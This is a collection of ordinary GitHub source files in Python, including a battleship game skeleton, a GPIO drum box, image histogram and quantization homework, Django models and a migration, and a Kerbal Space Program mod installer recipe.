+{"seq_id":"15457991132","text":"from random import randint\n\n\nuser_board = [[' '] * 8 for x in range(8)]\n\ncomputer_board = [[' '] * 8 for x in range(8)]\n\nletters_to_numbers = {\n 'A': 0,\n 'B': 1,\n 'C': 2,\n 'D': 3,\n 'E': 4,\n 'F': 5,\n 'G': 6,\n 'H': 7,\n}\n\ndef print_board(board):\n print('A B C D E F G H')\n print('----------------')\n row_number = 1\n for row in board:\n print(\"%d|%s|\" % (row_number, \"|\".join(row)))\n row_number += 1\n\ndef place_ships(board):\n for ship in range(8):\n ship_row, ship_column = randint(0, 7), randint(0, 7)\n while board[ship_row][ship_column] == 'x':\n ship_row, ship_column = randint(0, 7), randint(0, 7)\n board[ship_row][ship_column] = 'X'\n\ndef play_game():\n pass\n\ndef valid_coordinates():\n row = input(\"Enter the row of the ship: \").upper()\n while row not in \"12345678\":\n print(\"Please select a valid number between 1 and 8 inclusive\")\n row = input(\"Enter the row of the ship: \").upper()\n column = input(\"Enter the column of the ship: \").upper()\n while column not in \"ABCDEFGH\":\n print(\"Please choose a valud option between A and H inclusive\")\n column = input(\"Enter the column of the ship: \").upper()\n return int(row) - 1, letters_to_numbers[column]\n \ndef ships_sunk(board):\n count = 0\n for row in board:\n for column in row:\n if column == \"X\":\n count += 1\n return count\n\ndef new_game():\n pass\n\n\n","repo_name":"Johncci/battleship-down","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"28300473465","text":"import pygame\nfrom gpiozero import Button, LEDBoard\nfrom signal import pause\n\npygame.init()\n\nbutton_1 = Button(14)\nbutton_2 = Button(18)\nbutton_3 = Button(9)\nbutton_4 = Button(10)\n\nled = LEDBoard(11,22,27,17)\n\n\nsound1 = pygame.mixer.Sound('samples/drum_tom_mid_hard.wav')\nsound2 = pygame.mixer.Sound('samples/drum_splash_hard.wav')\nsound3 = pygame.mixer.Sound('samples/drum_cowbell.wav')\nsound4 = pygame.mixer.Sound('samples/drum_cymbal_closed.wav')\n\n\nbutton_1.when_pressed = sound1.play\nbutton_2.when_pressed = sound2.play\nbutton_3.when_pressed = sound3.play\nbutton_4.when_pressed = sound4.play\n\ndef button_1_on() :\n led.value = (1,0,0,0)\n \ndef button_2_on() :\n led.value = (0,1,0,0)\n \ndef button_3_on() :\n led.value = (0,0,1,0)\n \ndef button_4_on() :\n led.value = (0,0,0,1)\n \n\nwhile True:\n if button_1.is_pressed:\n button_1_on()\n \n if button_2.is_pressed:\n button_2_on() \n \n if button_3.is_pressed:\n button_3_on()\n\n if button_4.is_pressed:\n button_4_on()\n","repo_name":"n3rdz/gpio-musicbox","sub_path":"musicbox.py","file_name":"musicbox.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"18774615949","text":"import matplotlib.pyplot as plt\nimport json\nimport math\n\nimport matplotlib as mil\nmil.use('TkAgg')\n\n\nclass Agent:\n\n def __init__(self, position, **agent_attributes):\n self.position = position\n for attr_name, attr_value in agent_attributes.items():\n setattr(self, attr_name, attr_value)\n\n\nclass Position:\n def __init__(self, longitude_degrees, latitude_degrees):\n # We store the degree values, but we will be mostly using radians\n # because they are much more convenient for computation purposes.\n\n # assert : Lève une exception si renvoie False\n assert -180 <= longitude_degrees <= 180\n self.longitude_degrees = longitude_degrees\n\n assert -90 <= latitude_degrees <= 90\n self.latitude_degrees = latitude_degrees\n\n @property\n def longitude(self):\n # Longitude in radians\n return self.longitude_degrees * math.pi / 180\n\n @property\n def latitude(self):\n # Latitude in radians\n return self.latitude_degrees * math.pi / 180\n\n\nclass Zone:\n \"\"\"\n A rectangular geographic area bounded by two corners. The corners can\n be top-left and bottom right, or top-right and bottom-left so you should be\n careful when computing the distances between them.\n \"\"\"\n ZONES = []\n\n # Attributs de classe (constante si hors de la classe) car on fait cls.WIDTH_DEGREES\n MIN_LONGITUDE_DEGREES = -180\n MAX_LONGITUDE_DEGREES = 180\n MIN_LATITUDE_DEGREES = -90\n MAX_LATITUDE_DEGREES = 90\n WIDTH_DEGREES = 1 # degrees of longitude\n HEIGHT_DEGREES = 1 # degrees of\n EARTH_RADIUS_KILOMETERS = 6371\n\n # S'il y a un attribut d'instance, il va dans __init__\n def __init__(self, corner1, corner2):\n self.corner1 = corner1\n self.corner2 = corner2\n self.inhabitants = []\n\n @property\n def population(self):\n return len(self.inhabitants)\n\n @property\n def width(self):\n # Note that here we access the class attribute via \"self\" and it\n # doesn't make any difference\n return abs(self.corner1.longitude - self.corner2.longitude) * self.EARTH_RADIUS_KILOMETERS\n\n @property\n def height(self):\n return abs(self.corner1.latitude - self.corner2.latitude) * self.EARTH_RADIUS_KILOMETERS\n\n @property\n def area(self):\n return self.height * self.width\n\n def population_density(self):\n return self.population / self.area\n\n def average_agreeableness(self):\n if not self.inhabitants:\n return 0\n # agreeableness = []\n # for inhabitant in self.inhabitants:\n # agreeableness.append(inhabitant.agreableness)\n # return sum(agreeableness) / self.population\n return sum([inhabitant.agreeableness for inhabitant in self.inhabitants]) / self.population\n\n def add_inhabitant(self, inhabitant):\n self.inhabitants.append(inhabitant)\n\n def contains(self, position):\n \"\"\"Return True if the zone contains this position\"\"\"\n return position.longitude >= min(self.corner1.longitude, self.corner2.longitude) and \\\n position.longitude < max(self.corner1.longitude, self.corner2.longitude) and \\\n position.latitude >= min(self.corner1.latitude, self.corner2.latitude) and \\\n position.latitude < max(\n self.corner1.latitude, self.corner2.latitude)\n\n @classmethod\n def find_zone_that_contains(cls, position):\n if not cls.ZONES:\n # Initialize zones automatically if necessary\n cls._initialize_zones()\n\n # Compute the index in the ZONES array that contains the given position\n longitude_index = int(\n (position.longitude_degrees - cls.MIN_LONGITUDE_DEGREES) / cls.WIDTH_DEGREES)\n latitude_index = int(\n (position.latitude_degrees - cls.MIN_LATITUDE_DEGREES) / cls.HEIGHT_DEGREES)\n longitude_bins = int((cls.MAX_LONGITUDE_DEGREES -\n cls.MIN_LONGITUDE_DEGREES) / cls.WIDTH_DEGREES) # 180-(-180) / 1\n zone_index = latitude_index * longitude_bins + longitude_index\n\n # Just checking that the index is correct\n zone = cls.ZONES[zone_index]\n assert zone.contains(position)\n\n return zone\n\n @classmethod\n def _initialize_zones(cls):\n for latitude in range(cls.MIN_LATITUDE_DEGREES, cls.MAX_LATITUDE_DEGREES, cls.HEIGHT_DEGREES):\n for longitude in range(cls.MIN_LONGITUDE_DEGREES, cls.MAX_LONGITUDE_DEGREES, cls.WIDTH_DEGREES):\n bottom_left_corner = Position(longitude, latitude)\n top_right_corner = Position(\n longitude + cls.WIDTH_DEGREES, latitude + cls.HEIGHT_DEGREES)\n zone = Zone(bottom_left_corner, top_right_corner)\n cls.ZONES.append(zone)\n\n\nclass BaseGraph:\n\n def __init__(self):\n self.title = \"Your graph title\"\n self.x_label = \"X-axis label\"\n self.y_label = \"X-axis label\"\n self.show_grid = True\n\n def show(self, zones):\n # x_values = gather only x_values from our zones\n # y_values = gather only y_values from our zones\n x_values, y_values = self.xy_values(zones)\n plt.plot(x_values, y_values, '.')\n plt.xlabel(self.x_label)\n plt.ylabel(self.y_label)\n plt.title(self.title)\n plt.grid(self.show_grid)\n plt.show()\n\n def xy_values(self, zones):\n raise NotImplementedError\n\n\nclass AgreeablenessGraph(BaseGraph):\n\n def __init__(self):\n # Call base constructor\n super(AgreeablenessGraph, self).__init__()\n # super().__init__()\n self.title = \"Nice people live in the countryside\"\n self.x_label = \"population density\"\n self.y_label = \"agreeableness\"\n\n def xy_values(self, zones):\n x_values = [zone.population_density() for zone in zones]\n y_values = [zone.average_agreeableness() for zone in zones]\n return x_values, y_values\n\n\ndef main():\n # Zone.initialize_zones()\n for agent_attributes in json.load(open(\"agents-100k.json\")):\n latitude = agent_attributes.pop(\"latitude\")\n longitude = agent_attributes.pop(\"longitude\")\n position = Position(longitude, latitude)\n agent = Agent(position, **agent_attributes)\n # print(agent.agreeableness)\n zone = Zone.find_zone_that_contains(position)\n zone.add_inhabitant(agent)\n # print(\"Zone population: \", zone.population)\n # print(zone.average_agreeableness())\n\n agreeableness_graph = AgreeablenessGraph()\n agreeableness_graph.show(Zone.ZONES)\n\n\nmain()\n\n# agent = Agent(agent_attributes)\n# print(agent.agreeableness)\n# print(agent.neuroticism)\n","repo_name":"jlum85/POO-Python","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":6700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"45923155735","text":"# get forecast_time attrs from dset to use in interpolation\ndef open_ds( fn, variable ):\n ''' cleanly read variable/close a single hourly netcdf '''\n import xarray as xr\n ds = xr.open_dataset( fn, autoclose=True )\n out = ds[ variable ].copy()\n ds.close()\n return out\ndef list_files( dirname ):\n '''\n list the files and split the filenames into their descriptor parts and \n return dataframe of elements and filename sorted by:['year', 'month', 'day', 'hour']\n '''\n import os\n import pandas as pd\n\n files = [ get_month_day( os.path.join(r, fn)) for r,s,files in os.walk( dirname ) \n for fn in files if os.path.split(r)[-1].isdigit() and fn.endswith( '.nc' )\n and '-*.nc' not in fn and 'old' not in r and 'test' not in r ]\n\n files_df = pd.DataFrame( files )\n return files_df.sort_values( ['year', 'month', 'day', 'hour'] ).reset_index()\ndef get_month_day( fn ):\n dirname, basename = os.path.split( fn )\n year, month, day_hour = basename.split('.')[-2].split('-')\n day, hour = day_hour.split( '_' )\n folder_year = dirname.split('/')[-1]\n return {'fn':fn, 'year':year, 'folder_year':folder_year,'month':month, 'day':day, 'hour':hour}\ndef get_forecast_time( fn ):\n return open_ds( fn, variable='PCPT' ).attrs['forecast_time']\ndef get_file_attrs( fn ):\n try:\n fn_args = get_month_day( fn )\n fn_args.update( forecast_time=get_forecast_time( fn ) )\n except:\n # if there is an issue... dont fail, do this...\n nodata = -9999\n fn_args = {'fn':fn, 'year':nodata, 'folder_year':nodata,'month':nodata, 'day':nodata, 'hour':nodata, 'forecast_time':nodata}\n return fn_args\n\nif __name__ == '__main__':\n import xarray as xr\n import pandas as pd\n import multiprocessing as mp\n import os\n \n # setup args\n # base_path = '/storage01/pbieniek/ccsm/hist/hourly'\n base_path = '/storage01/pbieniek/ccsm/rcp85/hourly'\n # base_path = '/storage01/pbieniek/erain/hourly'\n # base_path = '/storage01/rtladerjr/hourly'\n \n # fn_list = [ os.path.join( r, fn ) for r,s,files in os.walk( base_path ) \n # if 'oldstuff' not in r for fn in files if fn.endswith( '.nc' ) \n # and 'test' not in fn and '-*.nc' not in fn ]\n \n fn_list = list_files( base_path )\n # drop unneeded duplicates\n fn_list = fn_list[ fn_list.folder_year == fn_list.year ]\n print( 'number of files: {}'.format(len( fn_list )) )\n\n ncpus = 32\n output_path = '/workspace/Shared/Tech_Projects/wrf_data/project_data/wrf/docs'\n group = 'ccsm_rcp85'\n # group = 'erain'\n # group = 'gfdl_rcp85'\n\n pool = mp.Pool( ncpus )\n print( 'start multiprocessing' )\n out = [ pool.map( get_file_attrs, fnl['fn'] ) for group, fnl in fn_list.groupby( 'year' ) ]\n out = [ j for i in out for j in i ]\n print( 'multiprocessing complete' )\n pool.close()\n pool.join()\n\n print( 'df' )\n df = pd.DataFrame( out )\n output_filename = os.path.join( output_path, 'WRFDS_forecast_time_attr_{}.csv'.format( group ) )\n print( 'writing to disk' )\n df.to_csv( output_filename, sep=',' )\n","repo_name":"ua-snap/wrf_utils","sub_path":"archive/snap_wrf_data_prep/pipeline/get_date_forecast_time_from_raw_hourly.py","file_name":"get_date_forecast_time_from_raw_hourly.py","file_ext":"py","file_size_in_byte":3159,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"}
+{"seq_id":"27583150160","text":"def get_and_strip_number(s):\n # replace this comment and the next statement with your function body\n return 0, ''\n\ndef get_and_strip_word(s):\n # replace this comment and the next statement with your function body\n return '', ''\n \ndef pad_words(s, num_words, final_len):\n if num_words <= 1: # best we can do is fill out the line with spaces\n return s + ((final_len - len(s))*' ')\n\n # there are at least 2 words, so at least one pigeon hole to fill (with spaces)\n num_pigeon_holes = num_words - 1 # the buckets (pigeon holes) are between words\n num_pigeons = final_len - (len(s) - num_pigeon_holes) # my pigeons are spaces\n pad_num = num_pigeons // num_pigeon_holes\n extra_num = num_pigeons % num_pigeon_holes # number of holes that get an extra pigeon\n working_str = ''\n \n # take care of the first num_pigeon_holes - extra_num holes\n for i in range(num_pigeon_holes - extra_num):\n word, s = get_and_strip_word(s)\n working_str += word + (pad_num * ' ') # insert pad_num spaces\n\n # take care of the last extra_num holes\n for i in range(extra_num):\n word, s = get_and_strip_word(s)\n working_str += word + ((pad_num + 1) * ' ')\n\n working_str += s\n return working_str\n\nsentence = \"This is a test.\"\nfilled_sentence = pad_words(sentence, 4, 20)\nprint(filled_sentence)\n\nfilled_sentence = pad_words(\"What?\", 1, 30)\nprint(filled_sentence)\n\nprint(pad_words(\"What's up?\", 2, 30))\n\n\n\n\n","repo_name":"Trent-Farley/All-Code","sub_path":"Python1/lab_4_files/python_tutor_exercise.py","file_name":"python_tutor_exercise.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"14803697131","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom skimage.color import rgb2gray\r\nimport skimage.color\r\nfrom imageio import imread\r\n\r\n# the matrix to transfer from rgb to yiq and vice versa\r\nCONSTANT_MATRIX = np.array([[0.299, 0.587, 0.114],\r\n [0.596, -0.275, -0.321],\r\n [0.212, -0.523, 0.311]])\r\n\r\n\r\ndef read_image(filename, representation):\r\n \"\"\"\r\n Gets a filename and an int representing which color image we want(greyscale or rgb)\r\n :param filename: A string\r\n :param representation: An int. 1 for greyscale and 2 for rgb\r\n :return: A matrix representing the image\r\n \"\"\"\r\n im = imread(filename)\r\n im_float = im.astype(np.float64)\r\n im_float /= 255\r\n if representation == 1 and len(im.T) == 3:\r\n return rgb2gray(im_float)\r\n\r\n else:\r\n return im_float\r\n\r\n\r\ndef imdisplay(filename, representation):\r\n \"\"\"\r\n Gets an image and shows it on the screen\r\n :param filename: A string ( name of the image)\r\n :param representation: An int. 1 for greyscale and 2 for rgb\r\n :return: None\r\n \"\"\"\r\n image = read_image(filename, representation)\r\n plt.imshow(image, cmap=plt.cm.gray)\r\n plt.axis('off')\r\n plt.show()\r\n\r\n\r\ndef rgb2yiq(imRGB):\r\n \"\"\"\r\n changing the color from rgb to yiq using\r\n the constant matrix I was given\r\n :param imRGB: A matrix that is shaped (x*y*3)\r\n :return: a yiq matrix\r\n \"\"\"\r\n return np.dot(imRGB, CONSTANT_MATRIX.T)\r\n\r\n\r\ndef yiq2rgb(imYIQ):\r\n \"\"\"\r\n changing the color from yiq to rgb using\r\n the constant matrix I was given\r\n :param imYIQ: A matrix that is shaped (x*y*3)\r\n :return: a rgb matrix\r\n \"\"\"\r\n\r\n return np.dot(imYIQ, (np.linalg.inv(CONSTANT_MATRIX)).T)\r\n\r\n\r\ndef histogram_image(image):\r\n \"\"\"\r\n This is the helper function for histogram equalizer that differentiates\r\n greyscale image from rgb\r\n :param image: A matrix representing the image\r\n :return: if the image is rgb then returns the histogram for y and True\r\n else returns the histogram for the picture and False\r\n \"\"\"\r\n is_rgb = False\r\n if len(image.T) == 3: # check to see if the image is rgb\r\n image = rgb2yiq(image)\r\n is_rgb = True\r\n\r\n original_hist = None\r\n if is_rgb:\r\n y = image[:, :, 0]\r\n y *= 255\r\n y = np.round(y)\r\n original_hist, axis = np.histogram(y, 256, (0, 255))\r\n\r\n if not is_rgb:\r\n image = (image*255).round().astype(np.uint8)\r\n original = image\r\n original_hist, axis = np.histogram(original, 256, (0, 255))\r\n\r\n return original_hist, is_rgb\r\n\r\n\r\ndef histogram_equalize(im_orig):\r\n \"\"\"\r\n Gets a Matrix of an image and equalizes the histogram\r\n :param im_orig: A matrix representing the image\r\n :return: The new equalized image, the original histogram, the new histogram\r\n \"\"\"\r\n original = im_orig.copy()\r\n original_hist, is_rgb = histogram_image(original)\r\n # if is_rgb:\r\n original = (original*255).round().astype(np.uint8)\r\n cumulative_hist = np.cumsum(original_hist)\r\n # find m (first grey scale that is non zero)\r\n non_zeroes = np.nonzero(cumulative_hist)\r\n m = non_zeroes[0][0]\r\n\r\n T = 255 * ((cumulative_hist - cumulative_hist[m]) / (cumulative_hist[-1] - cumulative_hist[m]))\r\n T = np.round(T)\r\n image = T[original.astype(np.uint8)]\r\n new_hist, bins = np.histogram(image, 256, (0, 255))\r\n image_float = image.astype(np.float64)\r\n image_float /= 255\r\n if is_rgb:\r\n original = rgb2yiq(im_orig)\r\n original[:, :, 0] = image_float[:, :, 0]\r\n return yiq2rgb(original), original_hist, new_hist\r\n\r\n else:\r\n return image_float, original_hist, new_hist\r\n\r\n\r\ndef quantize(im_orig, n_qaunt, n_iter):\r\n \"\"\"\r\n This function quantize a given image\r\n :param im_orig: The image in a matrix form\r\n :param n_qaunt: The number of colors we are given\r\n :param n_iter: The number of iterations we want\r\n :return: A tuple. The new image in a matrix form and the error rate of\r\n each iteration in an array.\r\n \"\"\"\r\n original = im_orig.copy()\r\n original_histogram, is_rgb = histogram_image(original)\r\n if is_rgb:\r\n original = np.floor(original * 255)\r\n error_list = []\r\n q_list = [0] * n_qaunt\r\n cumulative_hist = np.cumsum(original_histogram)\r\n\r\n z_list = [0] + [np.where(cumulative_hist >= i * (cumulative_hist[-1] / n_qaunt))[0][0]\r\n for i in range(1, n_qaunt)] + [255]\r\n\r\n for j in range(n_qaunt):\r\n lower_val = z_list[j] + 1\r\n upper_val = z_list[j + 1]\r\n g_val = np.arange(lower_val, upper_val + 1)\r\n q_list[j] = np.sum(g_val * original_histogram[lower_val: upper_val + 1]) / \\\r\n np.sum(original_histogram[lower_val: upper_val + 1])\r\n\r\n for i in range(n_iter):\r\n\r\n # compute the new z values\r\n temp_z = [0] + [(q_list[i-1] + q_list[i])/2 for i in range(1, n_qaunt)] + [255]\r\n\r\n # check z values\r\n if temp_z == z_list:\r\n break\r\n elif temp_z != z_list:\r\n z_list = temp_z\r\n # compute the new q values\r\n\r\n for j in range(n_qaunt):\r\n lower_val = int(z_list[j]) + 1\r\n upper_val = int(z_list[j + 1])\r\n g_val = np.arange(lower_val, upper_val + 1)\r\n q_list[j] = np.sum(g_val * original_histogram[lower_val: upper_val + 1]) /\\\r\n np.sum(original_histogram[lower_val: upper_val + 1])\r\n\r\n # compute the error value of this iteration\r\n error_rate = 0\r\n for k in range(n_qaunt):\r\n current_q = q_list[k]\r\n lower_val = int(z_list[k]) + 1\r\n upper_val = int(z_list[k + 1])\r\n g_values = np.arange(lower_val, upper_val+1)\r\n error_rate += np.sum(np.power(current_q-g_values, 2)*original_histogram[lower_val: upper_val + 1])\r\n\r\n error_list.append(error_rate)\r\n\r\n new_hist = np.array([0] * 256)\r\n\r\n for m in range(n_qaunt):\r\n lower_val = int(z_list[m])\r\n upper_val = int(z_list[m+1])\r\n new_hist[lower_val: upper_val+1] = np.floor(q_list[m])\r\n\r\n image = new_hist[original.astype(np.uint64)]\r\n\r\n image_float = image.astype(np.float64)\r\n image_float /= 255\r\n if is_rgb:\r\n im_orig = rgb2yiq(im_orig)\r\n im_orig[:, :, 0] = image_float[:, :, 0]\r\n return yiq2rgb(im_orig), error_list\r\n else:\r\n return image_float, error_list\r\n\r\n\r\nimages = []\r\njer_bw = read_image(r\"externals/jerusalem.jpg\", 1)\r\nimages.append((jer_bw, \"jerusalem grayscale\"))\r\njer_rgb = read_image(r\"externals/jerusalem.jpg\", 2)\r\nimages.append((jer_rgb, \"jerusalem RGB\"))\r\nlow_bw = read_image(r\"externals/low_contrast.jpg\", 1)\r\nimages.append((low_bw, \"low_contrast grayscale\"))\r\nlow_rgb = read_image(r\"externals/low_contrast.jpg\", 2)\r\nimages.append((low_rgb, \"low_contrast RGB\"))\r\nmonkey_bw = read_image(r\"externals/monkey.jpg\", 1)\r\nimages.append((monkey_bw, \"monkey grayscale\"))\r\nmonkey_rgb = read_image(r\"externals/monkey.jpg\", 2)\r\nimages.append((monkey_rgb, \"monkey RGB\"))\r\n\r\n\r\ndef test_rgb2yiq_and_yiq2rgb(im, name):\r\n \"\"\"\r\n Tests the rgb2yiq and yiq2rgb functions by comparing them to the built in ones in the skimage library.\r\n Allows error to magnitude of 1.e-3 (Difference from built in functions can't be bigger than 0.001).\r\n :param im: The image to test on.\r\n :param name: Name of image.\r\n :return: 1 on success, 0 on failure.\r\n \"\"\"\r\n imp = rgb2yiq(im)\r\n off = skimage.color.rgb2yiq(im)\r\n\r\n if not np.allclose(imp, off, atol=1.e-3):\r\n print(\"ERROR: in rgb2yiq on image '%s'\" % name)\r\n return 0\r\n imp2 = yiq2rgb(imp)\r\n off2 = skimage.color.yiq2rgb(off)\r\n if not np.allclose(imp2, off2, atol=1.e-3):\r\n print(\"ERROR: in yiq2rgb on image '%s'\" % name)\r\n return 0\r\n print(\"passed conversion test on '%s'\" % name)\r\n return 1\r\n\r\n\r\nfor im in images:\r\n if len(im[0].shape) == 3:\r\n result = test_rgb2yiq_and_yiq2rgb(im[0], im[1])\r\n if not result:\r\n print(\"=== Failed Conversion Test ===\")\r\n break\r\n\r\n\r\ndef display_all(im, add_bonus):\r\n if len(im.shape) == 3 and add_bonus:\r\n fig, a = plt.subplots(nrows=3, ncols=2)\r\n else:\r\n fig, a = plt.subplots(nrows=2, ncols=2)\r\n\r\n # adds the regular image\r\n a[0][0].imshow(im, cmap=plt.cm.gray)\r\n a[0][0].set_title(r\"original image\")\r\n\r\n # adds the quantified image\r\n quant = quantize(im, 3, 10)[0]\r\n a[0][1].imshow(quant, cmap=plt.cm.gray)\r\n a[0][1].set_title(r\"quantize to 3 levels, 10 iterations\")\r\n\r\n # adds the histogram equalized image\r\n hist = histogram_equalize(im)[0]\r\n a[1][0].imshow(hist, cmap=plt.cm.gray)\r\n a[1][0].set_title(\"histogram equalization\")\r\n\r\n # adds quantization on histogram equalized image\r\n hist_quant = quantize(hist, 6, 10)[0]\r\n a[1][1].imshow(hist_quant, cmap=plt.cm.gray)\r\n a[1][1].set_title(\"quantize on equalization\")\r\n\r\n # adds the bonus image\r\n # if len(im.shape) == 3 and add_bonus:\r\n # a[2][0].imshow(quantize_rgb(im, 3))\r\n # a[2][0].set_title(r\"bonus quantize_rgb\")\r\n\r\n plt.show()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n for im in images:\r\n # change \"False\" to \"True\" if you wish to add the bonus task to the print\r\n display_all(im[0], False)\r\n # im = read_image(\"monkey.jpg\", 2)\r\n # yiq = rgb2yiq(im)\r\n # img = yiq2rgb(yiq)\r\n # x = np.hstack([np.repeat(np.arange(0, 50, 2), 10)[None, :], np.array([255] * 6)[None, :]])\r\n # x_normalize = x.astype(np.float64)\r\n # x_normalize /= 255\r\n # grad = np.tile(x_normalize, (256, 1))\r\n # result = histogram_equalize(grad)\r\n #\r\n # plt.imshow(result[0], cmap=plt.cm.gray)\r\n # plt.show()\r\n # after_quant = quantize(result[0], 5, 5)\r\n # # plt.show()\r\n # plt.imshow(after_quant[0], cmap=plt.cm.gray)\r\n # plt.show()\r\n # print(after_quant[1])\r\n # hist = histogram_image(after_quant[0])\r\n # print(hist[0])\r\n\r\n # imdisplay(\"monkey.jpg\", 2)\r\n # imdisplay(\"monkey.jpg\", 1)\r\n","repo_name":"yairabraham5/Image-processing","sub_path":"ex1-yairabraham5/sol1.py","file_name":"sol1.py","file_ext":"py","file_size_in_byte":10067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"23189543404","text":"\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('modulector', '0020_auto_20210130_0317'),\n ]\n\n operations = [\n migrations.RunSQL(\"delete from MODULECTOR_URLTEMPLATE where name in ('quickgo', 'microrna', 'targetscan')\"),\n migrations.RunSQL(\"update MODULECTOR_URLTEMPLATE set name = 'mirbase' where name ='mirdb'\")\n\n ]\n","repo_name":"omics-datascience/modulector","sub_path":"modulector/migrations/0021_delete_url_templates.py","file_name":"0021_delete_url_templates.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"19"}
+{"seq_id":"70398509804","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.core.validators import MaxValueValidator, MinValueValidator\nimport uuid\n\n\nclass UserProfile(models.Model):\n id = models.UUIDField(\n primary_key=True,\n default=uuid.uuid4,\n editable=False\n )\n user = models.ForeignKey(User,on_delete=models.CASCADE)#username,email etc.\n created = models.DateTimeField(auto_now_add=True)\n updated = models.DateTimeField(auto_now=True)\n image = models.ImageField(upload_to='images/',blank=True,null=True)\n description = models.TextField(blank=True,null=True)\n birthday = models.DateField()\n\n def __str__(self):\n return str(self.user.username)\n\n\nclass Category(models.Model):\n \"\"\" Product has a category \"\"\"\n id = models.UUIDField(\n primary_key=True,\n default=uuid.uuid4,\n editable=False\n )\n name = models.CharField(max_length=200)\n def __str__(self):\n return str(self.name)\n \n\nclass Tag(models.Model):\n id = models.UUIDField(\n primary_key=True,\n default=uuid.uuid4,\n editable=False\n )\n \"\"\" Product has tag. For a better search operation \"\"\"\n name = models.CharField(max_length=200)\n def __str__(self):\n return str(self.name)\n\nclass Product(models.Model):\n id = models.UUIDField(\n primary_key=True,\n default=uuid.uuid4,\n editable=False\n )\n name = models.CharField(max_length=150)\n description = models.CharField(max_length=1500)\n price = models.PositiveIntegerField()\n category = models.ManyToManyField(Category,related_name=\"product_categories\")\n tags = models.ManyToManyField(Tag,related_name=\"product_tags\")\n created = models.DateTimeField(auto_now_add=True)\n updated = models.DateTimeField(auto_now=True)\n sold = models.BooleanField(default=False)\n #thumbnail = models.ImageField(upload_to=\"images/\",blank=True,null=True)\n\n def __str__(self):\n return str(self.name)\n \n def get_thumbnail(self,instance):\n images = instance.objects.filter(product=self)\n for image in images:\n if image.is_thumbnail:\n return image.image\n\n \n\n\n\nclass Comment(models.Model):\n \"\"\" Product has comment. To give an idea to users \"\"\"\n id = models.UUIDField(\n primary_key=True,\n default=uuid.uuid4,\n editable=False\n )\n user = models.OneToOneField(User,on_delete=models.CASCADE)\n product = models.OneToOneField(Product,on_delete=models.CASCADE)\n comment = models.CharField(max_length=500)\n\n def __str__(self):\n return str(self.comment)[:20]\n \n\n \n\nclass Point(models.Model):\n \"\"\" Product has point that given by users \"\"\"\n user = models.OneToOneField(User,on_delete=models.PROTECT)\n product = models.OneToOneField(Product,on_delete=models.CASCADE)\n value = models.PositiveSmallIntegerField(default=5, validators=[\n MaxValueValidator(5),\n MinValueValidator(1)\n ])\n\n def __str__(self):\n return f\"{self.user.username} : {self.product.name} -> {self.value}\"\n\nclass ProductImage(models.Model):\n \"\"\" Products can have multiple images \"\"\"\n product = models.ForeignKey(Product,on_delete=models.CASCADE)\n image = models.ImageField(upload_to = \"images/\")\n is_thumbnail = models.BooleanField(default=False)\n\n def __str__(self):\n return f\" image for {self.product.name}\"\n\nclass Basket(models.Model):\n user = models.ForeignKey(User,on_delete=models.CASCADE)\n products = models.ManyToManyField(Product,related_name=\"products_in_basket\")\n\n def __str__(self):\n return f\"{self.user}\"\n","repo_name":"yunusarli/Flopit","sub_path":"main/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"2481939544","text":"import shutil\nimport pathlib\nfrom lib.utils import rm_rf\nfrom lib.recipes import Receipt\n\n\nclass adopted(Receipt):\n depends=[\"KOS\"]\n\n def __init__(self, game_dir, project_dir):\n super().__init__(game_dir, project_dir)\n\n def build(self):\n pass\n\n def can_install(self):\n return True\n\n def install(self):\n adopted_path = pathlib.Path().joinpath(\"adopted\").resolve()\n target_dir = self.game_dir.joinpath(\"GameData\", \"XyphosAerospace\")\n rm_rf(target_dir)\n shutil.copytree(adopted_path.joinpath(\n \"GameData\", \"XyphosAerospace\"), target_dir)\n target_dir = self.game_dir.joinpath(\"GameData\", \"IndicatorLightsCommunityExtensions\")\n rm_rf(target_dir)\n shutil.copytree(adopted_path.joinpath(\n \"GameData\", \"IndicatorLightsCommunityExtensions\"), target_dir)\n target_dir = self.game_dir.joinpath(\"GameData\", \"NFEOutdated\")\n rm_rf(target_dir)\n shutil.copytree(adopted_path.joinpath(\n \"GameData\", \"NFEOutdated\"), target_dir)\n\n def check_installed(self):\n target_dir = self.game_dir.joinpath(\"GameData\", \"XyphosAerospace\")\n return target_dir.exists()\n","repo_name":"untoldwind/kerbal-env","sub_path":"lib/recipes/adopted.py","file_name":"adopted.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
